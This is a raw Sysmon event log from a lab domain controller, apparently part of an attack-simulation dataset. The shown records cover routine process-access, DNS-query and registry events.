08:41:46.042{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16CA-5F84-7000-000000007F01}4120C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002409Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.027{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16CA-5F84-7000-000000007F01}4120C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002408Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16CA-5F84-7000-000000007F01}4120C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002407Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.027{5D479F2C-169F-5F84-0B00-000000007F01}864992C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 22542200x80000000000000002494Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.086{5D479F2C-169F-5F84-0B00-000000007F01}864_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002493Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.081{5D479F2C-169F-5F84-0B00-000000007F01}864_ldap._tcp.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002492Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.077{5D479F2C-169F-5F84-0B00-000000007F01}864ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002491Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.074{5D479F2C-169F-5F84-0B00-000000007F01}864_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002490Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.069{5D479F2C-169F-5F84-0B00-000000007F01}864_ldap._tcp.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002489Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.065{5D479F2C-169F-5F84-0B00-000000007F01}864DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002488Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.061{5D479F2C-169F-5F84-0B00-000000007F01}864_kpasswd._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002487Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.058{5D479F2C-169F-5F84-0B00-000000007F01}864_kpasswd._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002486Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.054{5D479F2C-169F-5F84-0B00-000000007F01}864_kerberos._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002485Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.050{5D479F2C-169F-5F84-0B00-000000007F01}864_gc._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 10341000x80000000000000002484Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:47.714{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16CB-5F84-7500-000000007F01}4336C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002483Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:47.714{5D479F2C-16A1-5F84-1000-000000007F01}11443948C:\Windows\system32\svchost.exe{5D479F2C-16CB-5F84-7500-000000007F01}4336C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\wer.dll+6dc28|C:\Windows\System32\wer.dll+370d0|C:\Windows\System32\wer.dll+383dc|C:\Windows\System32\wer.dll+13954|C:\Windows\System32\wer.dll+51b6|c:\windows\system32\wuaueng.dll+d4e38|c:\windows\system32\wuaueng.dll+554a8|c:\windows\system32\wuaueng.dll+4e24b|c:\windows\system32\wuaueng.dll+4e49b|c:\windows\system32\wuaueng.dll+4e5fe|c:\windows\system32\wuaueng.dll+4fb28|c:\windows\system32\wuaueng.dll+5c36f|c:\windows\system32\wuaueng.dll+4d1d5|c:\windows\system32\wuaueng.dll+4c805|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002482Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:47.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002481Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:47.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002480Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:47.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002479Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:47.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002478Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:47.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002477Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:47.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002476Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:47.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002475Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:47.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002474Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:47.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 22542200x80000000000000002495Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:47.902{5D479F2C-16A1-5F84-1100-000000007F01}1200attackrange.local1460-C:\Windows\System32\svchost.exe 13241300x80000000000000002496Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-SetValue2020-10-12 08:41:54.355{5D479F2C-16A1-5F84-1200-000000007F01}1208C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{A8D961BE-57DD-4F29-800A-005FFAFE7E61}\DateLastConnectedBinary Data 22542200x80000000000000002547Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:54.258{5D479F2C-16A1-5F84-1400-000000007F01}1308win-dc-3574060.attackrange.local0fe80::8a:7e6:f5ff:fef1;2001:0:2851:782c:8a:7e6:f5ff:fef1;fe80::64fd:4c36:9a5d:fb14;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002546Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:54.251{5D479F2C-16B1-5F84-2700-000000007F01}2024WIN-DC-35740600fe80::8a:7e6:f5ff:fef1;2001:0:2851:782c:8a:7e6:f5ff:fef1;fe80::64fd:4c36:9a5d:fb14;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002545Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:54.193{5D479F2C-169F-5F84-0B00-000000007F01}864_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002544Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:54.188{5D479F2C-16A1-5F84-1100-000000007F01}1200win-dc-3574060.attackrange.local0fe80::8a:7e6:f5ff:fef1;fe80::64fd:4c36:9a5d:fb14;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002543Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:54.183{5D479F2C-16B1-5F84-2700-000000007F01}2024WIN-DC-35740600fe80::8a:7e6:f5ff:fef1;fe80::64fd:4c36:9a5d:fb14;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002542Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:54.090{5D479F2C-16A1-5F84-1000-000000007F01}1144win10.ipv6.microsoft.com.0type: 5 onpremwindows.ipv6.microsoft.com.akadns.net;type: 5 trdovmssukwest.ipv6.microsoft.com.akadns.net;40.81.120.44;C:\Windows\System32\svchost.exe 22542200x80000000000000002541Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:53.892{5D479F2C-16A1-5F84-1000-000000007F01}1144win-dc-3574060.attackrange.local0fe80::64fd:4c36:9a5d:fb14;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002540Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:53.888{5D479F2C-169F-5F84-0B00-000000007F01}864win-dc-3574060.attackrange.local0fe80::64fd:4c36:9a5d:fb14;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 10341000x80000000000000002539Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.152{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1700-000000007F01}1840C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002538Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.152{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1300-000000007F01}1296C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002537Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.152{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-0F00-000000007F01}1136C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002536Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.152{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002535Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.152{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002534Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 